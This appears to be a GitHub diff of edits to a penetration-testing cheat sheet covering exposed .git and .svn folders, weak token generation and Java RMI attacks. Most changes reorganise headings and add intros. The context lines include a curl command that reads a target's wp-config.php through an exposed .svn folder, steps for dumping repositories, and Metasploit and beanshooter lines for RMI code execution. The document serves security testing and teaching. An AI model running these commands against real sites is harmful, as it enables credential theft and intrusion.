A GUID (Globally Unique Identifier) or UUID (Universally Unique Identifier) is a 128-bit number used to uniquely identify information in computer systems. They are typically represented as a string of hexadecimal digits, divided into five groups separated by hyphens, such as `550e8400-e29b-41d4-a716-446655440000`. GUIDs/UUIDs are designed to be unique across both space and time, reducing the likelihood of duplication even when generated by different systems or at different times.
|
||||
|
@ -148,13 +187,17 @@ Breaking mt_rand() with two output values and no bruteforce.
|
|||
```
|
||||
|
||||
|
||||
## Other
|
||||
## Custom Algorithms
|
||||
|
||||
Other bad ideas that are sometimes shipped into production.
|
||||
Creating your own randomness algorithm is generally not recommended. Below are some examples found on GitHub or StackOverflow that are sometimes used in production, but may not be reliable or secure.
|
||||
|
||||
* `$token = md5($emailId).rand(10,9999);`
|
||||
* `$token = md5(time()+123456789 % rand(4000, 55000000));`
|
||||
|
||||
|
||||
|
||||
### Tools
|
||||
|
||||
Generic identification and sandwitch attack:
|
||||
|
||||
* [AethliosIK/reset-tolkien](https://github.com/AethliosIK/reset-tolkien) - Insecure time-based secret exploitation and Sandwich attack implementation Resources
|
||||
|
|
|
@ -1,5 +1,8 @@
|
|||
# Bazaar
|
||||
|
||||
> Bazaar (also known as bzr ) is a free, distributed version control system (DVCS) that helps you track project history over time and collaborate seamlessly with others. Developed by Canonical, Bazaar emphasizes ease of use, a flexible workflow, and rich features to cater to both individual developers and large teams.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
|
|
|
@ -2,26 +2,26 @@
|
|||
|
||||
## Summary
|
||||
|
||||
* [Example](#example)
|
||||
* [Methodology](#methodology)
|
||||
* [Recovering file contents from .git/logs/HEAD](#recovering-file-contents-from-gitlogshead)
|
||||
* [Recovering file contents from .git/index](#recovering-file-contents-from-gitindex)
|
||||
* [Tools](#tools)
|
||||
* [Automatic recovery](#automatic-recovery)
|
||||
* [git-dumper.py](#git-dumperpy)
|
||||
* [diggit.py](#diggitpy)
|
||||
* [GoGitDumper](#gogitdumper)
|
||||
* [rip-git](#rip-git)
|
||||
* [GitHack](#githack)
|
||||
* [GitTools](#gittools)
|
||||
* [Harvesting secrets](#harvesting-secrets)
|
||||
* [trufflehog](#trufflehog)
|
||||
* [Yar](#yar)
|
||||
* [Gitrob](#gitrob)
|
||||
* [Gitleaks](#gitleaks)
|
||||
* [Automatic recovery](#automatic-recovery)
|
||||
* [git-dumper.py](#git-dumperpy)
|
||||
* [diggit.py](#diggitpy)
|
||||
* [GoGitDumper](#gogitdumper)
|
||||
* [rip-git](#rip-git)
|
||||
* [GitHack](#githack)
|
||||
* [GitTools](#gittools)
|
||||
* [Harvesting secrets](#harvesting-secrets)
|
||||
* [trufflehog](#trufflehog)
|
||||
* [Yar](#yar)
|
||||
* [Gitrob](#gitrob)
|
||||
* [Gitleaks](#gitleaks)
|
||||
* [Refererences]
|
||||
|
||||
|
||||
## Example
|
||||
## Methodology
|
||||
|
||||
The following examples will create either a copy of the .git or a copy of the current commit.
|
||||
|
||||
|
@ -31,6 +31,7 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||
- .git/HEAD
|
||||
- .git/logs/HEAD
|
||||
|
||||
|
||||
### Recovering file contents from .git/logs/HEAD
|
||||
|
||||
1. Check for 403 Forbidden or directory listing to find the `/.git/` directory
|
||||
|
@ -83,6 +84,7 @@ Check for the following files, if they exist you can extract the .git folder.
|
|||
git cat-file -p cb6139863967a752f3402b3975e97a84d152fd8f
|
||||
```
|
||||
|
||||
|
||||
### Recovering file contents from .git/index
|
||||
|
||||
Use the git index file parser https://pypi.python.org/pypi/gin (python3).
|
||||
|
@ -103,6 +105,7 @@ name = CRLF injection/README.md
|
|||
sha1 = d7ef4d77741c38b6d3806e0c6a57bf1090eec141
|
||||
```
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### Automatic recovery
|
||||
|
@ -166,6 +169,7 @@ git clone https://github.com/internetwache/GitTools
|
|||
git checkout -- .
|
||||
```
|
||||
|
||||
|
||||
### Harvesting secrets
|
||||
|
||||
#### trufflehog
|
||||
|
|
|
@ -1,5 +1,8 @@
|
|||
# Mercurial
|
||||
|
||||
> Mercurial (also known as hg from the chemical symbol for mercury) is a distributed version control system (DVCS) designed for efficiency and scalability. Developed by Matt Mackall and first released in 2005, Mercurial is known for its speed, simplicity, and ability to handle large codebases.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
|
|
|
@ -1,15 +1,17 @@
|
|||
# Insecure Source Code Management
|
||||
|
||||
Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
|
||||
> Insecure Source Code Management (SCM) can lead to several critical vulnerabilities in web applications and services. Developers often rely on SCM systems like Git and Subversion (SVN) to manage their source code versions. However, poor security practices, such as leaving .git and .svn folders in production environments exposed to the internet, can pose significant risks.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Methodology](#methodology)
|
||||
* [Bazaar](./Bazaar.md)
|
||||
* [Git](./Git.md)
|
||||
* [Mercurial](./Mercurial.md)
|
||||
* [Subversion](./Subversion.md)
|
||||
* [Methodology](#methodology)
|
||||
* [Labs](#labs)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Methodology
|
||||
|
@ -26,6 +28,7 @@ The first step is to gather information about the target application. This can b
|
|||
* **Manual Inspection** : Check URLs manually by navigating to common SCM paths.
|
||||
* http://target.com/.git/
|
||||
* http://target.com/.svn/
|
||||
|
||||
* **Automated Tools** : Refer to the page related to the specific technology.
|
||||
|
||||
Once a potential SCM folder is identified, check the HTTP response codes and contents. You might need to bypass `.htaccess` or Reverse Proxy rules.
|
||||
|
@ -40,6 +43,10 @@ location /.git {
|
|||
|
||||
For example in Git, the exploitation technique doesn't require to list the content of the `.git` folder (http://target.com/.git/), the data extraction can still be conducted when files can be read.
|
||||
|
||||
## Labs
|
||||
|
||||
* [Root Me - Insecure Code Management](https://www.root-me.org/fr/Challenges/Web-Serveur/Insecure-Code-Management)
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -1,14 +1,27 @@
|
|||
# Subversion
|
||||
|
||||
> Subversion (often abbreviated as SVN) is a centralized version control system (VCS) that has been widely used in the software development industry. Originally developed by CollabNet Inc. in 2000, Subversion was designed to be an improved version of CVS (Concurrent Versions System) and has since gained significant traction for its robustness and reliability.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Examples](#examples)
|
||||
* [Tools](#tools)
|
||||
* [svn-extractor](#svn-extractor)
|
||||
* [Methodology](#methodology)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Examples
|
||||
## Tools
|
||||
|
||||
### svn-extractor
|
||||
|
||||
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
|
||||
```powershell
|
||||
python svn-extractor.py --url "url with .svn available"
|
||||
```
|
||||
|
||||
|
||||
## Methodology
|
||||
|
||||
```powershell
|
||||
curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
||||
|
@ -25,15 +38,6 @@ curl http://blog.domain.com/.svn/text-base/wp-config.php.svn-base
|
|||
* create complete path, which will be: `http://server/path_to_vulnerable_site/.svn/pristine/94/945a60e68acc693fcb74abadb588aac1a9135f62.svn-base`
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
### svn-extractor
|
||||
|
||||
* [anantshri/svn-extractor](https://github.com/anantshri/svn-extractor) - Simple script to extract all web resources by means of .SVN folder exposed over network.
|
||||
```powershell
|
||||
python svn-extractor.py --url "url with .svn available"
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
|
|
|
@ -2,16 +2,18 @@
|
|||
|
||||
> Java RMI (Remote Method Invocation) is a Java API that allows an object running in one JVM (Java Virtual Machine) to invoke methods on an object running in another JVM, even if they're on different physical machines. RMI provides a mechanism for Java-based distributed computing.
|
||||
|
||||
|
||||
## Summary
|
||||
|
||||
* [Tools](#tools)
|
||||
* [Detection](#detection)
|
||||
* [Exploitation](#exploitation)
|
||||
* [Methodology](#methodology)
|
||||
* [RCE using beanshooter](#rce-using-beanshooter)
|
||||
* [RCE using sjet/mjet](#rce-using-sjet-or-mjet)
|
||||
* [RCE using Metasploit](#rce-using-metasploit)
|
||||
* [References](#references)
|
||||
|
||||
|
||||
## Tools
|
||||
|
||||
- [siberas/sjet](https://github.com/siberas/sjet)
|
||||
|
@ -19,6 +21,7 @@
|
|||
- [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
|
||||
- [qtc-de/beanshooter](https://github.com/qtc-de/beanshooter) - JMX enumeration and attacking tool.
|
||||
|
||||
|
||||
## Detection
|
||||
|
||||
* Using [nmap](https://nmap.org/):
|
||||
|
@ -35,7 +38,7 @@
|
|||
| javax.management.remote.rmi.RMIServerImpl_Stub
|
||||
```
|
||||
|
||||
* Using [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
|
||||
* Using [qtc-de/remote-method-guesser](https://github.com/qtc-de/remote-method-guesser):
|
||||
```bash
|
||||
$ rmg scan 172.17.0.2 --ports 0-65535
|
||||
[+] Scanning 6225 Ports on 172.17.0.2 for RMI services.
|
||||
|
@ -60,7 +63,7 @@
|
|||
[...]
|
||||
```
|
||||
|
||||
* Using Metasploit
|
||||
* Using [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework)
|
||||
```bash
|
||||
use auxiliary/scanner/misc/java_rmi_server
|
||||
set RHOSTS <IPs>
|
||||
|
@ -68,7 +71,7 @@
|
|||
run
|
||||
```
|
||||
|
||||
## Exploitation
|
||||
## Methodology
|
||||
|
||||
If a Java Remote Method Invocation (RMI) service is poorly configured, it becomes vulnerable to various Remote Code Execution (RCE) methods. One method involves hosting an MLet file and directing the JMX service to load MBeans from a distant server, achievable using tools like mjet or sjet. The remote-method-guesser tool is newer and combines RMI service enumeration with an overview of recognized attack strategies.
|
||||
|
||||
|
@ -134,6 +137,7 @@ set RPORT <PORT>
|
|||
run
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
- [Attacking RMI based JMX services - Hans-Martin Münch - April 28, 2019](https://mogwailabs.de/en/blog/2019/04/attacking-rmi-based-jmx-services/)
|
||||
|
|
Loading…
Reference in a new issue